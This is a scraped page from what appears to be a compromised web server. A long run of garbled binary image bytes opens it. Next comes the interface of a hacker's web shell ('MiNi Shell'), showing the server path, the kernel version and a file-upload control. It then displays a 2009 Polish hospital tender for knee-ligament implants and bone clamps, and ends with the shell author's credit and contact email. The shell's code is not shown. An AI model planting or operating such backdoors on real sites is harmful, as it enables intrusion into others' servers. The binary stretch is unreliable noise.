JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090225/40318-N-2009.html

<p class="kh_header"><b>Sucha Beskidzka: Dostawa:
Pakiet nr 1-  dostawa systemu do rekonstrukcji więzadła krzyżowego przedniego stawu kolanowego.
Pakiet nr 2- dostawa obejm i płytek do ściągania odłamów kości</b><br>
<b>Numer ogłoszenia: 40318 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa:
Pakiet nr 1-  dostawa systemu do rekonstrukcji więzadła krzyżowego przedniego stawu kolanowego.
Pakiet nr 2- dostawa obejm i płytek do ściągania odłamów kości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Określenie przedmiotu zamówienia.
Pakiet nr 1:
I. Przedmiotem zamówienia jest dostawa systemu do rekonstrukcji więzadła krzyżowego przedniego przy użyciu autogennego przeszczepu ze ścięgna określonego w załączniku nr 2 do SIWZ..
W skład systemu wchodzi:
a) Element  mocujący koniec udowy przeszczepu:
element umożliwiający implantację przezkanałową, zaopatrzony w przewiązkę mocującą przeszczep więzadłowy, wykonany ze stopu tytanu, posiadający mechanizm blokujący, który pozwoli na zakotwiczenie implantu z przeszczepem w części korowej kości udowej. 
Wielkość elementu mocującego: średnica w granicach od 7 mm do 10 mm, długość w co najmniej 3 rozmiarach w przedziale do 25 mm. 
Pakowane sterylnie.
b) Element mocujący koniec piszczelowy przeszczepu:
Śruba kaniulowana, wykonana z materiału biowchłanialnego, z gwintem chroniącym przeszczep, pokrywającym śrubę na całej długości.
Wielkość śrub: średnica od 7 mm do 12 mm, długość min. 20 mm, max. 25 mm.
Pakowane sterylnie. Pojedynczo.
c) Prowadnica do śrub: komplementarna do śrub.
II. Wielkość i struktura zamówienia.
1. Element mocujący koniec udowy przeszczepu: 30 kompletów (za komplet uważa się
    zestaw implantów we wszystkich rozmiarach).
2. Element mocujący koniec piszczelowy przeszczepu: 30 kompletów (za komplet 
    uważa się zestaw implantów we wszystkich rozmiarach).
3. Szydło do prowadzenia przeszczepu- 5 sztuk.
Pakiet nr 2
1. Przedmiotem zamówienia jest dostawa obejm i płytek do ściągania odłamów kości określonych w załączniku nr 3 do SIWZ.
I. W skład wchodzi:
a) linka z kulką na końcu+ zacisk 1,6 mm- komplet
b) Zacisk
c) linka z kulką na końcu
II. Wielkość i struktura zamówienia.
a) linka z kulką na końcu+ zacisk 1,6 mm- komplet- 40 kpl.
b) Zacisk - 20 szt
c) linka z kulką na końcu- 20 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1	Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
2	Posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
4	Spełnienie warunków udziału  w postępowaniu o zamówienie publiczne z art. 22 ust.1
4	Nie podlega wykluczeniu na podstawie art. 24 ust.1 pkt.1-2
- w ciągu ostatnich trzech lat przed wszczęciem postępowania Dostawca nie wyrządził szkody nie wykonując zamówienia lub wykonując je nienależycie, a szkoda ta nie została dobrowolnie naprawiona do dnia wszczęcia postępowania
- w stosunku do dostawców nie otwarto likwidacji lub upadłości
5	Nie zalega z uiszczenie podatków, opłat 
6	Nie zalega z uiszczeniem składek na ubezpieczenie społeczne lub zdrowotne
7	Nie podlega wykluczeniu na podstawie art.24 ust.1 pkt.4-8
8	Nie podlega wykluczeniu na podstawie art.24 ust.1 pkt.9
1	Wymagane świadectwa	Dokumenty potwierdzające podstawę dopuszczenia wszystkich wyrobów medycznych do obrotu w Polsce zgodnie z ustawą z dnia 20 kwietnia 2004r.
o wyrobach medycznych (Dz.U.Nr 93 poz. 896) i przepisami wykonawczymi.
Zamawiający wymaga , aby dokumenty potwierdzające podstawę dopuszczenia do obrotu były ważne na dzień składania ofert. Dokumenty, które stracą ważność w trakcie trwania umowy należy uzupełnić aktualnymi.

2	Potwierdzenie spełnienia parametrów technicznych	Foldery i katalogi- dołączyć do oferty
Ocena spełnienia warunków udziału w postępowaniu nastąpi w systemie spełnia-nie spełnia na podstawie złożonych w/w dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek ich posiadania na podjęcie działalności gospodarczej w zakresie objętym zamówieniem
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają  wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3. Oświadczenie, że oferent posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia	
4.Oświdczenie, że oferent znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia	
5. Oświadczenie, że oferent spełnienia warunki udziału  w postępowaniu o zamówienie publiczne z art. 22 ust.1	
6. Ośiadczenie, że oferent nie podlega wykluczeniu na podstawie art. 24 ust.1 pkt.1-2
- w ciągu ostatnich trzech lat przed wszczęciem postępowania Dostawca nie wyrządził szkody nie wykonując zamówienia lub wykonując je nienależycie, a szkoda ta nie została dobrowolnie naprawiona do dnia wszczęcia postępowania
- w stosunku do dostawców nie otwarto likwidacji lub upadłości	



7. Aktualne (wydane nie wcześniej niż 3 miesiące przed terminem składania ofert) zaświadczeniem właściwego naczelnika urzędu skarbowego, że dostawca nie zalega z opłacaniem podatków i opłat, chyba że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
8.Aktualne (wydane nie wcześniej niż 3 miesiące przed terminem składania ofert) zaświadczeniem właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, że dostawca nie zalega z opłacaniem składek  na ubezpieczenie zdrowotne i społeczne chyba że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji
9. Oświadczenie, że oferent nie podlega wykluczeniu na podstawie art.24 ust.1 pkt.4-8	
10. Oświadczenie, że oferent nie podlega wykluczeniu na podstawie art.24 ust.1 pkt.9	
Przedmiotowe:
1	Wymagane świadectwa	Dokumenty potwierdzające podstawę dopuszczenia wszystkich wyrobów medycznych do obrotu w Polsce zgodnie z ustawą z dnia 20 kwietnia 2004r.
o wyrobach medycznych (Dz.U.Nr 93 poz. 896) i przepisami wykonawczymi.
Zamawiający wymaga , aby dokumenty potwierdzające podstawę dopuszczenia do obrotu były ważne na dzień składania ofert. Dokumenty, które stracą ważność w trakcie trwania umowy należy uzupełnić aktualnymi.

2	Potwierdzenie spełnienia parametrów technicznych	Foldery i katalogi- dołączyć do oferty.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych
Zespół Opieki Zdrowotnej
ul. Szpitalna 22
34-200 Sucha Beskidzka.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2009 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej
ul. Szpitalna 22
34-200 Sucha Beskidzka
Blok C, I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1-  dostawa systemu do rekonstrukcji więzadła krzyżowego przedniego stawu kolanowego..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1:
I. Przedmiotem zamówienia jest dostawa systemu do rekonstrukcji więzadła krzyżowego przedniego przy użyciu autogennego przeszczepu ze ścięgna określonego w załączniku nr 2 do SIWZ..
W skład systemu wchodzi:
a) Element  mocujący koniec udowy przeszczepu:
element umożliwiający implantację przezkanałową, zaopatrzony w przewiązkę mocującą przeszczep więzadłowy, wykonany ze stopu tytanu, posiadający mechanizm blokujący, który pozwoli na zakotwiczenie implantu z przeszczepem w części korowej kości udowej. 
Wielkość elementu mocującego: średnica w granicach od 7 mm do 10 mm, długość w co najmniej 3 rozmiarach w przedziale do 25 mm. 
Pakowane sterylnie.
b) Element mocujący koniec piszczelowy przeszczepu:
Śruba kaniulowana, wykonana z materiału biowchłanialnego, z gwintem chroniącym przeszczep, pokrywającym śrubę na całej długości.
Wielkość śrub: średnica od 7 mm do 12 mm, długość min. 20 mm, max. 25 mm.
Pakowane sterylnie. Pojedynczo.
c) Prowadnica do śrub: komplementarna do śrub.
II. Wielkość i struktura zamówienia.
1. Element mocujący koniec udowy przeszczepu: 30 kompletów (za komplet uważa się
    zestaw implantów we wszystkich rozmiarach).
2. Element mocujący koniec piszczelowy przeszczepu: 30 kompletów (za komplet 
    uważa się zestaw implantów we wszystkich rozmiarach).
3. Szydło do prowadzenia przeszczepu- 5 sztuk..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2- dostawa obejm i płytek do ściągania odłamów kości.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 2
1. Przedmiotem zamówienia jest dostawa obejm i płytek do ściągania odłamów kości określonych w załączniku nr 3 do SIWZ.
I. W skład wchodzi:
a) linka z kulką na końcu+ zacisk 1,6 mm- komplet
b) Zacisk
c) linka z kulką na końcu
II. Wielkość i struktura zamówienia.
a) linka z kulką na końcu+ zacisk 1,6 mm- komplet- 40 kpl.
b) Zacisk - 20 szt
c) linka z kulką na końcu- 20 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.32.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com